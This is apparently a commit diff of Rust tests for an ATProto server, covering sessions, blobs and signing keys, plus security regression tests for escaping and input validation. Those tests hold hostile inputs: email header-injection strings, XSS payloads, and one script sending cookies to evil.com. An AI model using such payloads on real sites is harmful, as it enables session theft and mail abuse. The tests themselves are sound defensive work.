use common::*;
3
use reqwest::{StatusCode, header};
4
use serde_json::Value;
5
+
6
#[tokio::test]
7
async fn test_upload_blob_no_auth() {
8
let client = client();
···
20
let body: Value = res.json().await.expect("Response was not valid JSON");
21
assert_eq!(body["error"], "AuthenticationRequired");
22
}
23
+
24
#[tokio::test]
25
async fn test_upload_blob_success() {
26
let client = client();
···
40
let body: Value = res.json().await.expect("Response was not valid JSON");
41
assert!(body["blob"]["ref"]["$link"].as_str().is_some());
42
}
43
+
44
#[tokio::test]
45
async fn test_upload_blob_bad_token() {
46
let client = client();
···
59
let body: Value = res.json().await.expect("Response was not valid JSON");
60
assert_eq!(body["error"], "AuthenticationFailed");
61
}
62
+
63
#[tokio::test]
64
async fn test_upload_blob_unsupported_mime_type() {
65
let client = client();
···
77
.expect("Failed to send request");
78
assert_eq!(res.status(), StatusCode::OK);
79
}
80
+
81
#[tokio::test]
82
async fn test_list_missing_blobs() {
83
let client = client();
···
95
let body: Value = res.json().await.expect("Response was not valid JSON");
96
assert!(body["blobs"].is_array());
97
}
98
+
99
#[tokio::test]
100
async fn test_list_missing_blobs_no_auth() {
101
let client = client();
+39
tests/security_fixes.rs
···
4
};
5
use bspds::oauth::templates::{login_page, error_page, success_page};
6
use bspds::image::{ImageProcessor, ImageError};
7
#[test]
8
fn test_sanitize_header_value_removes_crlf() {
9
let malicious = "Injected\r\nBcc: attacker@evil.com";
···
13
assert!(sanitized.contains("Injected"), "Original content should be preserved");
14
assert!(sanitized.contains("Bcc:"), "Text after newline should be on same line (no header injection)");
15
}
16
#[test]
17
fn test_sanitize_header_value_preserves_content() {
18
let normal = "Normal Subject Line";
19
let sanitized = sanitize_header_value(normal);
20
assert_eq!(sanitized, "Normal Subject Line");
21
}
22
#[test]
23
fn test_sanitize_header_value_trims_whitespace() {
24
let padded = " Subject ";
25
let sanitized = sanitize_header_value(padded);
26
assert_eq!(sanitized, "Subject");
27
}
28
#[test]
29
fn test_sanitize_header_value_handles_multiple_newlines() {
30
let input = "Line1\r\nLine2\nLine3\rLine4";
···
34
assert!(sanitized.contains("Line1"), "Content before newlines preserved");
35
assert!(sanitized.contains("Line4"), "Content after newlines preserved");
36
}
37
#[test]
38
fn test_email_header_injection_sanitization() {
39
let header_injection = "Normal Subject\r\nBcc: attacker@evil.com\r\nX-Injected: value";
···
44
assert!(sanitized.contains("Bcc:"), "Content after CRLF preserved as same line text");
45
assert!(sanitized.contains("X-Injected:"), "All content on same line");
46
}
47
#[test]
48
fn test_valid_phone_number_accepts_correct_format() {
49
assert!(is_valid_phone_number("+1234567890"));
···
52
assert!(is_valid_phone_number("+4915123456789"));
53
assert!(is_valid_phone_number("+1"));
54
}
55
#[test]
56
fn test_valid_phone_number_rejects_missing_plus() {
57
assert!(!is_valid_phone_number("1234567890"));
58
assert!(!is_valid_phone_number("12025551234"));
59
}
60
#[test]
61
fn test_valid_phone_number_rejects_empty() {
62
assert!(!is_valid_phone_number(""));
63
}
64
#[test]
65
fn test_valid_phone_number_rejects_just_plus() {
66
assert!(!is_valid_phone_number("+"));
67
}
68
#[test]
69
fn test_valid_phone_number_rejects_too_long() {
70
assert!(!is_valid_phone_number("+12345678901234567890123"));
71
}
72
#[test]
73
fn test_valid_phone_number_rejects_letters() {
74
assert!(!is_valid_phone_number("+abc123"));
75
assert!(!is_valid_phone_number("+1234abc"));
76
assert!(!is_valid_phone_number("+a"));
77
}
78
#[test]
79
fn test_valid_phone_number_rejects_spaces() {
80
assert!(!is_valid_phone_number("+1234 5678"));
81
assert!(!is_valid_phone_number("+ 1234567890"));
82
assert!(!is_valid_phone_number("+1 "));
83
}
84
#[test]
85
fn test_valid_phone_number_rejects_special_chars() {
86
assert!(!is_valid_phone_number("+123-456-7890"));
87
assert!(!is_valid_phone_number("+1(234)567890"));
88
assert!(!is_valid_phone_number("+1.234.567.890"));
89
}
90
#[test]
91
fn test_signal_recipient_command_injection_blocked() {
92
let malicious_inputs = vec![
···
103
assert!(!is_valid_phone_number(input), "Malicious input '{}' should be rejected", input);
104
}
105
}
106
#[test]
107
fn test_image_file_size_limit_enforced() {
108
let processor = ImageProcessor::new();
···
119
Ok(_) => panic!("Should reject files over size limit"),
120
}
121
}
122
#[test]
123
fn test_image_file_size_limit_configurable() {
124
let processor = ImageProcessor::new().with_max_file_size(1024);
···
126
let result = processor.process(&data, "image/jpeg");
127
assert!(result.is_err(), "Should reject files over configured limit");
128
}
129
#[test]
130
fn test_oauth_template_xss_escaping_client_id() {
131
let malicious_client_id = "<script>alert('xss')</script>";
···
133
assert!(!html.contains("<script>"), "Script tags should be escaped");
134
assert!(html.contains("<script>"), "HTML entities should be used for escaping");
135
}
136
#[test]
137
fn test_oauth_template_xss_escaping_client_name() {
138
let malicious_client_name = "<img src=x onerror=alert('xss')>";
···
140
assert!(!html.contains("<img "), "IMG tags should be escaped");
141
assert!(html.contains("&lt;img"), "IMG tag should be escaped as HTML entity");
142
}
143
#[test]
144
fn test_oauth_template_xss_escaping_scope() {
145
let malicious_scope = "\"><script>alert('xss')</script>";
146
let html = login_page("client123", None, Some(malicious_scope), "test-uri", None, None);
147
assert!(!html.contains("<script>"), "Script tags in scope should be escaped");
148
}
149
#[test]
150
fn test_oauth_template_xss_escaping_error_message() {
151
let malicious_error = "<script>document.location='http://evil.com?c='+document.cookie</script>";
152
let html = login_page("client123", None, None, "test-uri", Some(malicious_error), None);
153
assert!(!html.contains("<script>"), "Script tags in error should be escaped");
154
}
155
#[test]
156
fn test_oauth_template_xss_escaping_login_hint() {
157
let malicious_hint = "\" onfocus=\"alert('xss')\" autofocus=\"";
···
159
assert!(!html.contains("onfocus=\"alert"), "Event handlers should be escaped in login hint");
160
assert!(html.contains("&quot;"), "Quotes should be escaped");
161
}
162
#[test]
163
fn test_oauth_template_xss_escaping_request_uri() {
164
let malicious_uri = "\" onmouseover=\"alert('xss')\"";
165
let html = login_page("client123", None, None, malicious_uri, None, None);
166
assert!(!html.contains("onmouseover=\"alert"), "Event handlers should be escaped in request_uri");
167
}
168
#[test]
169
fn test_oauth_error_page_xss_escaping() {
170
let malicious_error = "<script>steal()</script>";
···
173
assert!(!html.contains("<script>"), "Script tags should be escaped in error page");
174
assert!(!html.contains("<img "), "IMG tags should be escaped in error page");
175
}
176
#[test]
177
fn test_oauth_success_page_xss_escaping() {
178
let malicious_name = "<script>steal_session()</script>";
179
let html = success_page(Some(malicious_name));
180
assert!(!html.contains("<script>"), "Script tags should be escaped in success page");
181
}
182
#[test]
183
fn test_oauth_template_no_javascript_urls() {
184
let html = login_page("client123", None, None, "test-uri", None, None);
···
188
let success_html = success_page(None);
189
assert!(!success_html.contains("javascript:"), "Success page should not contain javascript: URLs");
190
}
191
#[test]
192
fn test_oauth_template_form_action_safe() {
193
let malicious_uri = "javascript:alert('xss')//";
194
let html = login_page("client123", None, None, malicious_uri, None, None);
195
assert!(html.contains("action=\"/oauth/authorize\""), "Form action should be fixed URL");
196
}
197
#[test]
198
fn test_send_error_types_have_display() {
199
let timeout = SendError::Timeout;
···
203
assert!(!format!("{}", max_retries).is_empty());
204
assert!(!format!("{}", invalid_recipient).is_empty());
205
}
206
#[test]
207
fn test_send_error_timeout_message() {
208
let error = SendError::Timeout;
209
let msg = format!("{}", error);
210
assert!(msg.to_lowercase().contains("timeout"), "Timeout error should mention timeout");
211
}
212
#[test]
213
fn test_send_error_max_retries_includes_detail() {
214
let error = SendError::MaxRetriesExceeded("Server returned 503".to_string());
215
let msg = format!("{}", error);
216
assert!(msg.contains("503") || msg.contains("retries"), "MaxRetriesExceeded should include context");
217
}
218
#[tokio::test]
219
async fn test_check_signup_queue_accepts_session_jwt() {
220
use common::{base_url, client, create_account_and_login};
···
231
let body: serde_json::Value = res.json().await.unwrap();
232
assert_eq!(body["activated"], true);
233
}
234
#[tokio::test]
235
async fn test_check_signup_queue_no_auth() {
236
use common::{base_url, client};
···
245
let body: serde_json::Value = res.json().await.unwrap();
246
assert_eq!(body["activated"], true);
247
}
248
#[test]
249
fn test_html_escape_ampersand() {
250
let html = login_page("client&test", None, None, "test-uri", None, None);
251
assert!(html.contains("&amp;"), "Ampersand should be escaped");
252
assert!(!html.contains("client&test"), "Raw ampersand should not appear in output");
253
}
254
#[test]
255
fn test_html_escape_quotes() {
256
let html = login_page("client\"test'more", None, None, "test-uri", None, None);
257
assert!(html.contains("&quot;") || html.contains("&#34;"), "Double quotes should be escaped");
258
assert!(html.contains("&#x27;") || html.contains("&#39;"), "Single quotes should be escaped");
259
}
260
#[test]
261
fn test_html_escape_angle_brackets() {
262
let html = login_page("client<test>more", None, None, "test-uri", None, None);
···
264
assert!(html.contains("&gt;"), "Greater than should be escaped");
265
assert!(!html.contains("<test>"), "Raw angle brackets should not appear");
266
}
267
#[test]
268
fn test_oauth_template_preserves_safe_content() {
269
let html = login_page("my-safe-client", Some("My Safe App"), Some("read write"), "valid-uri", None, Some("user@example.com"));
···
271
assert!(html.contains("read write") || html.contains("read"), "Scope should be preserved");
272
assert!(html.contains("user@example.com"), "Login hint should be preserved");
273
}
274
#[test]
275
fn test_csrf_like_input_value_protection() {
276
let malicious = "\" onclick=\"alert('csrf')";
277
let html = login_page("client", None, None, malicious, None, None);
278
assert!(!html.contains("onclick=\"alert"), "Event handlers should not be executable");
279
}
280
#[test]
281
fn test_unicode_handling_in_templates() {
282
let unicode_client = "客户端 クライアント";
283
let html = login_page(unicode_client, None, None, "test-uri", None, None);
284
assert!(html.contains("客户端") || html.contains("&#"), "Unicode should be preserved or encoded");
285
}
286
#[test]
287
fn test_null_byte_in_input() {
288
let with_null = "client\0id";
289
let sanitized = sanitize_header_value(with_null);
290
assert!(sanitized.contains("client"), "Content before null should be preserved");
291
}
292
#[test]
293
fn test_very_long_input_handling() {
294
let long_input = "x".repeat(10000);
···
4
};
5
use bspds::oauth::templates::{login_page, error_page, success_page};
6
use bspds::image::{ImageProcessor, ImageError};
7
+
8
#[test]
9
fn test_sanitize_header_value_removes_crlf() {
10
let malicious = "Injected\r\nBcc: attacker@evil.com";
···
14
assert!(sanitized.contains("Injected"), "Original content should be preserved");
15
assert!(sanitized.contains("Bcc:"), "Text after newline should be on same line (no header injection)");
16
}
17
+
18
#[test]
19
fn test_sanitize_header_value_preserves_content() {
20
let normal = "Normal Subject Line";
21
let sanitized = sanitize_header_value(normal);
22
assert_eq!(sanitized, "Normal Subject Line");
23
}
24
+
25
#[test]
26
fn test_sanitize_header_value_trims_whitespace() {
27
let padded = " Subject ";
28
let sanitized = sanitize_header_value(padded);
29
assert_eq!(sanitized, "Subject");
30
}
31
+
32
#[test]
33
fn test_sanitize_header_value_handles_multiple_newlines() {
34
let input = "Line1\r\nLine2\nLine3\rLine4";
···
38
assert!(sanitized.contains("Line1"), "Content before newlines preserved");
39
assert!(sanitized.contains("Line4"), "Content after newlines preserved");
40
}
41
+
42
#[test]
43
fn test_email_header_injection_sanitization() {
44
let header_injection = "Normal Subject\r\nBcc: attacker@evil.com\r\nX-Injected: value";
···
49
assert!(sanitized.contains("Bcc:"), "Content after CRLF preserved as same line text");
50
assert!(sanitized.contains("X-Injected:"), "All content on same line");
51
}
52
+
53
#[test]
54
fn test_valid_phone_number_accepts_correct_format() {
55
assert!(is_valid_phone_number("+1234567890"));
···
58
assert!(is_valid_phone_number("+4915123456789"));
59
assert!(is_valid_phone_number("+1"));
60
}
61
+
62
#[test]
63
fn test_valid_phone_number_rejects_missing_plus() {
64
assert!(!is_valid_phone_number("1234567890"));
65
assert!(!is_valid_phone_number("12025551234"));
66
}
67
+
68
#[test]
69
fn test_valid_phone_number_rejects_empty() {
70
assert!(!is_valid_phone_number(""));
71
}
72
+
73
#[test]
74
fn test_valid_phone_number_rejects_just_plus() {
75
assert!(!is_valid_phone_number("+"));
76
}
77
+
78
#[test]
79
fn test_valid_phone_number_rejects_too_long() {
80
assert!(!is_valid_phone_number("+12345678901234567890123"));
81
}
82
+
83
#[test]
84
fn test_valid_phone_number_rejects_letters() {
85
assert!(!is_valid_phone_number("+abc123"));
86
assert!(!is_valid_phone_number("+1234abc"));
87
assert!(!is_valid_phone_number("+a"));
88
}
89
+
90
#[test]
91
fn test_valid_phone_number_rejects_spaces() {
92
assert!(!is_valid_phone_number("+1234 5678"));
93
assert!(!is_valid_phone_number("+ 1234567890"));
94
assert!(!is_valid_phone_number("+1 "));
95
}
96
+
97
#[test]
98
fn test_valid_phone_number_rejects_special_chars() {
99
assert!(!is_valid_phone_number("+123-456-7890"));
100
assert!(!is_valid_phone_number("+1(234)567890"));
101
assert!(!is_valid_phone_number("+1.234.567.890"));
102
}
103
+
104
#[test]
105
fn test_signal_recipient_command_injection_blocked() {
106
let malicious_inputs = vec![
···
117
assert!(!is_valid_phone_number(input), "Malicious input '{}' should be rejected", input);
118
}
119
}
120
+
121
#[test]
122
fn test_image_file_size_limit_enforced() {
123
let processor = ImageProcessor::new();
···
134
Ok(_) => panic!("Should reject files over size limit"),
135
}
136
}
137
+
138
#[test]
139
fn test_image_file_size_limit_configurable() {
140
let processor = ImageProcessor::new().with_max_file_size(1024);
···
142
let result = processor.process(&data, "image/jpeg");
143
assert!(result.is_err(), "Should reject files over configured limit");
144
}
145
+
146
#[test]
147
fn test_oauth_template_xss_escaping_client_id() {
148
let malicious_client_id = "<script>alert('xss')</script>";
···
150
assert!(!html.contains("<script>"), "Script tags should be escaped");
151
assert!(html.contains("&lt;script&gt;"), "HTML entities should be used for escaping");
152
}
153
+
154
#[test]
155
fn test_oauth_template_xss_escaping_client_name() {
156
let malicious_client_name = "<img src=x onerror=alert('xss')>";
···
158
assert!(!html.contains("<img "), "IMG tags should be escaped");
159
assert!(html.contains("&lt;img"), "IMG tag should be escaped as HTML entity");
160
}
161
+
162
#[test]
163
fn test_oauth_template_xss_escaping_scope() {
164
let malicious_scope = "\"><script>alert('xss')</script>";
165
let html = login_page("client123", None, Some(malicious_scope), "test-uri", None, None);
166
assert!(!html.contains("<script>"), "Script tags in scope should be escaped");
167
}
168
+
169
#[test]
170
fn test_oauth_template_xss_escaping_error_message() {
171
let malicious_error = "<script>document.location='http://evil.com?c='+document.cookie</script>";
172
let html = login_page("client123", None, None, "test-uri", Some(malicious_error), None);
173
assert!(!html.contains("<script>"), "Script tags in error should be escaped");
174
}
175
+
176
#[test]
177
fn test_oauth_template_xss_escaping_login_hint() {
178
let malicious_hint = "\" onfocus=\"alert('xss')\" autofocus=\"";
···
180
assert!(!html.contains("onfocus=\"alert"), "Event handlers should be escaped in login hint");
181
assert!(html.contains("&quot;"), "Quotes should be escaped");
182
}
183
+
184
#[test]
185
fn test_oauth_template_xss_escaping_request_uri() {
186
let malicious_uri = "\" onmouseover=\"alert('xss')\"";
187
let html = login_page("client123", None, None, malicious_uri, None, None);
188
assert!(!html.contains("onmouseover=\"alert"), "Event handlers should be escaped in request_uri");
189
}
190
+
191
#[test]
192
fn test_oauth_error_page_xss_escaping() {
193
let malicious_error = "<script>steal()</script>";
···
196
assert!(!html.contains("<script>"), "Script tags should be escaped in error page");
197
assert!(!html.contains("<img "), "IMG tags should be escaped in error page");
198
}
199
+
200
#[test]
201
fn test_oauth_success_page_xss_escaping() {
202
let malicious_name = "<script>steal_session()</script>";
203
let html = success_page(Some(malicious_name));
204
assert!(!html.contains("<script>"), "Script tags should be escaped in success page");
205
}
206
+
207
#[test]
208
fn test_oauth_template_no_javascript_urls() {
209
let html = login_page("client123", None, None, "test-uri", None, None);
···
213
let success_html = success_page(None);
214
assert!(!success_html.contains("javascript:"), "Success page should not contain javascript: URLs");
215
}
216
+
217
#[test]
218
fn test_oauth_template_form_action_safe() {
219
let malicious_uri = "javascript:alert('xss')//";
220
let html = login_page("client123", None, None, malicious_uri, None, None);
221
assert!(html.contains("action=\"/oauth/authorize\""), "Form action should be fixed URL");
222
}
223
+
224
#[test]
225
fn test_send_error_types_have_display() {
226
let timeout = SendError::Timeout;
···
230
assert!(!format!("{}", max_retries).is_empty());
231
assert!(!format!("{}", invalid_recipient).is_empty());
232
}
233
+
234
#[test]
235
fn test_send_error_timeout_message() {
236
let error = SendError::Timeout;
237
let msg = format!("{}", error);
238
assert!(msg.to_lowercase().contains("timeout"), "Timeout error should mention timeout");
239
}
240
+
241
#[test]
242
fn test_send_error_max_retries_includes_detail() {
243
let error = SendError::MaxRetriesExceeded("Server returned 503".to_string());
244
let msg = format!("{}", error);
245
assert!(msg.contains("503") || msg.contains("retries"), "MaxRetriesExceeded should include context");
246
}
247
+
248
#[tokio::test]
249
async fn test_check_signup_queue_accepts_session_jwt() {
250
use common::{base_url, client, create_account_and_login};
···
261
let body: serde_json::Value = res.json().await.unwrap();
262
assert_eq!(body["activated"], true);
263
}
264
+
265
#[tokio::test]
266
async fn test_check_signup_queue_no_auth() {
267
use common::{base_url, client};
···
276
let body: serde_json::Value = res.json().await.unwrap();
277
assert_eq!(body["activated"], true);
278
}
279
+
280
#[test]
281
fn test_html_escape_ampersand() {
282
let html = login_page("client&test", None, None, "test-uri", None, None);
283
assert!(html.contains("&amp;"), "Ampersand should be escaped");
284
assert!(!html.contains("client&test"), "Raw ampersand should not appear in output");
285
}
286
+
287
#[test]
288
fn test_html_escape_quotes() {
289
let html = login_page("client\"test'more", None, None, "test-uri", None, None);
290
assert!(html.contains("&quot;") || html.contains("&#34;"), "Double quotes should be escaped");
291
assert!(html.contains("&#x27;") || html.contains("&#39;"), "Single quotes should be escaped");
292
}
293
+
294
#[test]
295
fn test_html_escape_angle_brackets() {
296
let html = login_page("client<test>more", None, None, "test-uri", None, None);
···
298
assert!(html.contains("&gt;"), "Greater than should be escaped");
299
assert!(!html.contains("<test>"), "Raw angle brackets should not appear");
300
}
301
+
302
#[test]
303
fn test_oauth_template_preserves_safe_content() {
304
let html = login_page("my-safe-client", Some("My Safe App"), Some("read write"), "valid-uri", None, Some("user@example.com"));
···
306
assert!(html.contains("read write") || html.contains("read"), "Scope should be preserved");
307
assert!(html.contains("user@example.com"), "Login hint should be preserved");
308
}
309
+
310
#[test]
311
fn test_csrf_like_input_value_protection() {
312
let malicious = "\" onclick=\"alert('csrf')";
313
let html = login_page("client", None, None, malicious, None, None);
314
assert!(!html.contains("onclick=\"alert"), "Event handlers should not be executable");
315
}
316
+
317
#[test]
318
fn test_unicode_handling_in_templates() {
319
let unicode_client = "客户端 クライアント";
320
let html = login_page(unicode_client, None, None, "test-uri", None, None);
321
assert!(html.contains("客户端") || html.contains("&#"), "Unicode should be preserved or encoded");
322
}
323
+
324
#[test]
325
fn test_null_byte_in_input() {
326
let with_null = "client\0id";
327
let sanitized = sanitize_header_value(with_null);
328
assert!(sanitized.contains("client"), "Content before null should be preserved");
329
}
330
+
331
#[test]
332
fn test_very_long_input_handling() {
333
let long_input = "x".repeat(10000);
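
The XSS tests in this file look for the escaped entity forms of &, <, >, and quotes in the rendered templates. A minimal escaping helper consistent with those assertions is sketched below; the real bspds::oauth::templates escaping may be implemented differently.

// Illustrative sketch only: the entity replacements the assertions above
// check for; not the actual templates module.
fn escape_html(input: &str) -> String {
    input
        .replace('&', "&amp;") // ampersand first so later entities are not double-escaped
        .replace('<', "&lt;")
        .replace('>', "&gt;")
        .replace('"', "&quot;")
        .replace('\'', "&#x27;")
}
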
+17
tests/server.rs
···
4
use helpers::verify_new_account;
5
use reqwest::StatusCode;
6
use serde_json::{Value, json};
7
#[tokio::test]
8
async fn test_health() {
9
let client = client();
···
15
assert_eq!(res.status(), StatusCode::OK);
16
assert_eq!(res.text().await.unwrap(), "OK");
17
}
18
#[tokio::test]
19
async fn test_describe_server() {
20
let client = client();
···
30
let body: Value = res.json().await.expect("Response was not valid JSON");
31
assert!(body.get("availableUserDomains").is_some());
32
}
33
#[tokio::test]
34
async fn test_create_session() {
35
let client = client();
···
69
let body: Value = res.json().await.expect("Response was not valid JSON");
70
assert!(body.get("accessJwt").is_some());
71
}
72
#[tokio::test]
73
async fn test_create_session_missing_identifier() {
74
let client = client();
···
90
res.status()
91
);
92
}
93
#[tokio::test]
94
async fn test_create_account_invalid_handle() {
95
let client = client();
···
113
"Expected 400 for invalid handle chars"
114
);
115
}
116
#[tokio::test]
117
async fn test_get_session() {
118
let client = client();
···
127
.expect("Failed to send request");
128
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
129
}
130
#[tokio::test]
131
async fn test_refresh_session() {
132
let client = client();
···
188
assert_ne!(body["accessJwt"].as_str().unwrap(), access_jwt);
189
assert_ne!(body["refreshJwt"].as_str().unwrap(), refresh_jwt);
190
}
191
#[tokio::test]
192
async fn test_delete_session() {
193
let client = client();
···
202
.expect("Failed to send request");
203
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
204
}
205
#[tokio::test]
206
async fn test_get_service_auth_success() {
207
let client = client();
···
230
assert_eq!(claims["sub"], did);
231
assert_eq!(claims["aud"], "did:web:example.com");
232
}
233
#[tokio::test]
234
async fn test_get_service_auth_with_lxm() {
235
let client = client();
···
255
assert_eq!(claims["iss"], did);
256
assert_eq!(claims["lxm"], "com.atproto.repo.getRecord");
257
}
258
#[tokio::test]
259
async fn test_get_service_auth_no_auth() {
260
let client = client();
···
272
let body: Value = res.json().await.expect("Response was not valid JSON");
273
assert_eq!(body["error"], "AuthenticationRequired");
274
}
275
#[tokio::test]
276
async fn test_get_service_auth_missing_aud() {
277
let client = client();
···
287
.expect("Failed to send request");
288
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
289
}
290
#[tokio::test]
291
async fn test_check_account_status_success() {
292
let client = client();
···
308
assert!(body["repoRev"].is_string());
309
assert!(body["indexedRecords"].is_number());
310
}
311
#[tokio::test]
312
async fn test_check_account_status_no_auth() {
313
let client = client();
···
323
let body: Value = res.json().await.expect("Response was not valid JSON");
324
assert_eq!(body["error"], "AuthenticationRequired");
325
}
326
#[tokio::test]
327
async fn test_activate_account_success() {
328
let client = client();
···
338
.expect("Failed to send request");
339
assert_eq!(res.status(), StatusCode::OK);
340
}
341
#[tokio::test]
342
async fn test_activate_account_no_auth() {
343
let client = client();
···
351
.expect("Failed to send request");
352
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
353
}
354
#[tokio::test]
355
async fn test_deactivate_account_success() {
356
let client = client();
···
4
use helpers::verify_new_account;
5
use reqwest::StatusCode;
6
use serde_json::{Value, json};
7
+
8
#[tokio::test]
9
async fn test_health() {
10
let client = client();
···
16
assert_eq!(res.status(), StatusCode::OK);
17
assert_eq!(res.text().await.unwrap(), "OK");
18
}
19
+
20
#[tokio::test]
21
async fn test_describe_server() {
22
let client = client();
···
32
let body: Value = res.json().await.expect("Response was not valid JSON");
33
assert!(body.get("availableUserDomains").is_some());
34
}
35
+
36
#[tokio::test]
37
async fn test_create_session() {
38
let client = client();
···
72
let body: Value = res.json().await.expect("Response was not valid JSON");
73
assert!(body.get("accessJwt").is_some());
74
}
75
+
76
#[tokio::test]
77
async fn test_create_session_missing_identifier() {
78
let client = client();
···
94
res.status()
95
);
96
}
97
+
98
#[tokio::test]
99
async fn test_create_account_invalid_handle() {
100
let client = client();
···
118
"Expected 400 for invalid handle chars"
119
);
120
}
121
+
122
#[tokio::test]
123
async fn test_get_session() {
124
let client = client();
···
133
.expect("Failed to send request");
134
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
135
}
136
+
137
#[tokio::test]
138
async fn test_refresh_session() {
139
let client = client();
···
195
assert_ne!(body["accessJwt"].as_str().unwrap(), access_jwt);
196
assert_ne!(body["refreshJwt"].as_str().unwrap(), refresh_jwt);
197
}
198
+
199
#[tokio::test]
200
async fn test_delete_session() {
201
let client = client();
···
210
.expect("Failed to send request");
211
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
212
}
213
+
214
#[tokio::test]
215
async fn test_get_service_auth_success() {
216
let client = client();
···
239
assert_eq!(claims["sub"], did);
240
assert_eq!(claims["aud"], "did:web:example.com");
241
}
242
+
243
#[tokio::test]
244
async fn test_get_service_auth_with_lxm() {
245
let client = client();
···
265
assert_eq!(claims["iss"], did);
266
assert_eq!(claims["lxm"], "com.atproto.repo.getRecord");
267
}
268
+
269
#[tokio::test]
270
async fn test_get_service_auth_no_auth() {
271
let client = client();
···
283
let body: Value = res.json().await.expect("Response was not valid JSON");
284
assert_eq!(body["error"], "AuthenticationRequired");
285
}
286
+
287
#[tokio::test]
288
async fn test_get_service_auth_missing_aud() {
289
let client = client();
···
299
.expect("Failed to send request");
300
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
301
}
302
+
303
#[tokio::test]
304
async fn test_check_account_status_success() {
305
let client = client();
···
321
assert!(body["repoRev"].is_string());
322
assert!(body["indexedRecords"].is_number());
323
}
324
+
325
#[tokio::test]
326
async fn test_check_account_status_no_auth() {
327
let client = client();
···
337
let body: Value = res.json().await.expect("Response was not valid JSON");
338
assert_eq!(body["error"], "AuthenticationRequired");
339
}
340
+
341
#[tokio::test]
342
async fn test_activate_account_success() {
343
let client = client();
···
353
.expect("Failed to send request");
354
assert_eq!(res.status(), StatusCode::OK);
355
}
356
+
357
#[tokio::test]
358
async fn test_activate_account_no_auth() {
359
let client = client();
···
367
.expect("Failed to send request");
368
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
369
}
370
+
371
#[tokio::test]
372
async fn test_deactivate_account_success() {
373
let client = client();
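
Several of the service-auth tests above inspect JWT claims (iss, sub, aud, lxm). A test helper for reading those claims without verifying the signature could look roughly like the sketch below; the helpers module actually used by these tests is not shown here, so this is only an assumed shape (it presumes the base64 and serde_json crates).

// Illustrative sketch only: decode the payload segment of a JWT to inspect
// its claims, without verifying the signature (test-only convenience).
use base64::{engine::general_purpose::URL_SAFE_NO_PAD, Engine as _};

fn decode_jwt_claims(token: &str) -> Option<serde_json::Value> {
    let payload = token.split('.').nth(1)?; // header.payload.signature
    let bytes = URL_SAFE_NO_PAD.decode(payload).ok()?;
    serde_json::from_slice(&bytes).ok()
}
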
+10
tests/signing_key.rs
···
4
use serde_json::{json, Value};
5
use sqlx::PgPool;
6
use helpers::verify_new_account;
7
async fn get_pool() -> PgPool {
8
let conn_str = common::get_db_connection_string().await;
9
sqlx::postgres::PgPoolOptions::new()
···
12
.await
13
.expect("Failed to connect to test database")
14
}
15
#[tokio::test]
16
async fn test_reserve_signing_key_without_did() {
17
let client = common::client();
···
34
"Signing key should be in did:key format with multibase prefix"
35
);
36
}
37
#[tokio::test]
38
async fn test_reserve_signing_key_with_did() {
39
let client = common::client();
···
63
assert_eq!(row.did.as_deref(), Some(target_did));
64
assert_eq!(row.public_key_did_key, signing_key);
65
}
66
#[tokio::test]
67
async fn test_reserve_signing_key_stores_private_key() {
68
let client = common::client();
···
91
assert!(row.used_at.is_none(), "Reserved key should not be marked as used yet");
92
assert!(row.expires_at > chrono::Utc::now(), "Key should expire in the future");
93
}
94
#[tokio::test]
95
async fn test_reserve_signing_key_unique_keys() {
96
let client = common::client();
···
121
let key2 = body2["signingKey"].as_str().unwrap();
122
assert_ne!(key1, key2, "Each call should generate a unique signing key");
123
}
124
#[tokio::test]
125
async fn test_reserve_signing_key_is_public() {
126
let client = common::client();
···
140
"reserveSigningKey should work without authentication"
141
);
142
}
143
#[tokio::test]
144
async fn test_create_account_with_reserved_signing_key() {
145
let client = common::client();
···
190
"Reserved key should be marked as used"
191
);
192
}
193
#[tokio::test]
194
async fn test_create_account_with_invalid_signing_key() {
195
let client = common::client();
···
213
let body: Value = res.json().await.unwrap();
214
assert_eq!(body["error"], "InvalidSigningKey");
215
}
216
#[tokio::test]
217
async fn test_create_account_cannot_reuse_signing_key() {
218
let client = common::client();
···
268
.unwrap()
269
.contains("already used"));
270
}
271
#[tokio::test]
272
async fn test_reserved_key_tokens_work() {
273
let client = common::client();
···
4
use serde_json::{json, Value};
5
use sqlx::PgPool;
6
use helpers::verify_new_account;
7
+
8
async fn get_pool() -> PgPool {
9
let conn_str = common::get_db_connection_string().await;
10
sqlx::postgres::PgPoolOptions::new()
···
13
.await
14
.expect("Failed to connect to test database")
15
}
16
+
17
#[tokio::test]
18
async fn test_reserve_signing_key_without_did() {
19
let client = common::client();
···
36
"Signing key should be in did:key format with multibase prefix"
37
);
38
}
39
+
40
#[tokio::test]
41
async fn test_reserve_signing_key_with_did() {
42
let client = common::client();
···
66
assert_eq!(row.did.as_deref(), Some(target_did));
67
assert_eq!(row.public_key_did_key, signing_key);
68
}
69
+
70
#[tokio::test]
71
async fn test_reserve_signing_key_stores_private_key() {
72
let client = common::client();
···
95
assert!(row.used_at.is_none(), "Reserved key should not be marked as used yet");
96
assert!(row.expires_at > chrono::Utc::now(), "Key should expire in the future");
97
}
98
+
99
#[tokio::test]
100
async fn test_reserve_signing_key_unique_keys() {
101
let client = common::client();
···
126
let key2 = body2["signingKey"].as_str().unwrap();
127
assert_ne!(key1, key2, "Each call should generate a unique signing key");
128
}
129
+
130
#[tokio::test]
131
async fn test_reserve_signing_key_is_public() {
132
let client = common::client();
···
146
"reserveSigningKey should work without authentication"
147
);
148
}
149
+
150
#[tokio::test]
151
async fn test_create_account_with_reserved_signing_key() {
152
let client = common::client();
···
197
"Reserved key should be marked as used"
198
);
199
}
200
+
201
#[tokio::test]
202
async fn test_create_account_with_invalid_signing_key() {
203
let client = common::client();
···
221
let body: Value = res.json().await.unwrap();
222
assert_eq!(body["error"], "InvalidSigningKey");
223
}
224
+
225
#[tokio::test]
226
async fn test_create_account_cannot_reuse_signing_key() {
227
let client = common::client();
···
277
.unwrap()
278
.contains("already used"));
279
}
280
+
281
#[tokio::test]
282
async fn test_reserved_key_tokens_work() {
283
let client = common::client();
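
The signing-key tests assert that reserved keys come back in did:key form with a multibase prefix. A minimal shape check matching that expectation, assuming base58btc multibase ('z') as used by did:key, might be:

// Illustrative sketch only: checks the did:key shape the assertions above
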